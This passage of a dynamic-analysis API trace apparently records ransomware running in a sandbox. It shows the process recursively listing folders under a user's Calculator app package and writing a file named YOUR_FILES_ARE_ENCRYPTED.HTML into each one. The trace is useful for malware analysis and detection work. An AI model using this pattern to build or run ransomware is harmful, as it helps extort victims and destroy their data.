returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\*" [0119.966] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x563adc86, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x56afae31, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x56afae31, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0119.971] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x563adc86, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x56afae31, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x56afae31, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0119.971] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5652b1d3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5652b1d3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5652b1d3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AC", cAlternateFileName="")) returned 1 [0119.971] StrStrIW (lpFirst="AC", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.971] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC") returned 93 [0119.971] GetProcessHeap () returned 0x600000 [0119.971] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0119.972] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC" [0119.972] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\*" [0119.972] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5652b1d3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5652b1d3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5652b1d3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d146, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0119.982] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5652b1d3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5652b1d3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5652b1d3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d146, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0119.982] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5652b1d3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5652b1d3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5652b1d3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d146, dwReserved1=0x63d090, cFileName="INetCache", cAlternateFileName="INETCA~1")) returned 1 [0119.982] StrStrIW (lpFirst="INetCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.982] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\INetCache") returned 103 [0119.982] GetProcessHeap () returned 0x600000 [0119.982] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0119.983] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\INetCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\INetCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\INetCache" [0119.983] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\INetCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\INetCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\INetCache\\*" [0119.983] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\INetCache\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5652b1d3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5652b1d3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5652b1d3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x63d098, cFileName=".", cAlternateFileName="")) returned 0x626638 [0119.984] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5652b1d3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5652b1d3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5652b1d3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 1 [0119.984] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5652b1d3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5652b1d3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5652b1d3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 0 [0119.984] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0119.984] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 133 [0119.984] GetProcessHeap () returned 0x600000 [0119.984] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0119.984] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowscalculator_8wekyb3d8bbwe\\ac\\inetcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0119.985] WriteFile (in: hFile=0x324, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0119.986] CloseHandle (hObject=0x324) returned 1 [0119.986] GetProcessHeap () returned 0x600000 [0119.986] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0119.986] GetProcessHeap () returned 0x600000 [0119.986] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0119.986] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5652b1d3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5652b1d3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5652b1d3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d146, dwReserved1=0x63d090, cFileName="INetCookies", cAlternateFileName="INETCO~1")) returned 1 [0119.986] StrStrIW (lpFirst="INetCookies", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.986] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\INetCookies") returned 105 [0119.986] GetProcessHeap () returned 0x600000 [0119.986] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0119.987] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\INetCookies" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\INetCookies") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\INetCookies" [0119.987] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\INetCookies", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\INetCookies\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\INetCookies\\*" [0119.987] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\INetCookies\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5652b1d3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5652b1d3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5652b1d3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x63d098, cFileName=".", cAlternateFileName="")) returned 0x626638 [0119.987] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5652b1d3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5652b1d3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5652b1d3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 1 [0119.987] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5652b1d3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5652b1d3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5652b1d3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 0 [0119.987] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0119.987] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 135 [0119.987] GetProcessHeap () returned 0x600000 [0119.987] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0119.987] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowscalculator_8wekyb3d8bbwe\\ac\\inetcookies\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0119.988] WriteFile (in: hFile=0x324, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0119.989] CloseHandle (hObject=0x324) returned 1 [0119.989] GetProcessHeap () returned 0x600000 [0119.989] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0119.989] GetProcessHeap () returned 0x600000 [0119.989] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0119.990] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5652b1d3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5652b1d3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5652b1d3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d146, dwReserved1=0x63d090, cFileName="INetHistory", cAlternateFileName="INETHI~1")) returned 1 [0119.990] StrStrIW (lpFirst="INetHistory", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.990] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\INetHistory") returned 105 [0119.990] GetProcessHeap () returned 0x600000 [0119.990] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0119.991] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\INetHistory" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\INetHistory") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\INetHistory" [0119.991] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\INetHistory", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\INetHistory\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\INetHistory\\*" [0119.995] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\INetHistory\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5652b1d3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5652b1d3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5652b1d3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x63d098, cFileName=".", cAlternateFileName="")) returned 0x626638 [0119.996] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5652b1d3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5652b1d3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5652b1d3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 1 [0119.996] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5652b1d3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5652b1d3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5652b1d3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 0 [0119.996] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0119.996] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 135 [0119.996] GetProcessHeap () returned 0x600000 [0119.996] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0119.996] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowscalculator_8wekyb3d8bbwe\\ac\\inethistory\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0119.997] WriteFile (in: hFile=0x324, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0119.999] CloseHandle (hObject=0x324) returned 1 [0119.999] GetProcessHeap () returned 0x600000 [0119.999] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0119.999] GetProcessHeap () returned 0x600000 [0119.999] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0119.999] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5652b1d3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5652b1d3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5652b1d3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d146, dwReserved1=0x63d090, cFileName="Temp", cAlternateFileName="")) returned 1 [0119.999] StrStrIW (lpFirst="Temp", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.999] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\Temp") returned 98 [0119.999] GetProcessHeap () returned 0x600000 [0119.999] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0119.999] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\Temp" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\Temp") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\Temp" [0119.999] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\Temp", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\Temp\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\Temp\\*" [0119.999] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\Temp\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5652b1d3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5652b1d3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5652b1d3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x63d098, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0120.000] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5652b1d3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5652b1d3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5652b1d3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 1 [0120.000] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5652b1d3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5652b1d3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5652b1d3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 0 [0120.000] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0120.000] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 128 [0120.000] GetProcessHeap () returned 0x600000 [0120.000] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.000] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowscalculator_8wekyb3d8bbwe\\ac\\temp\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0120.001] WriteFile (in: hFile=0x324, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, 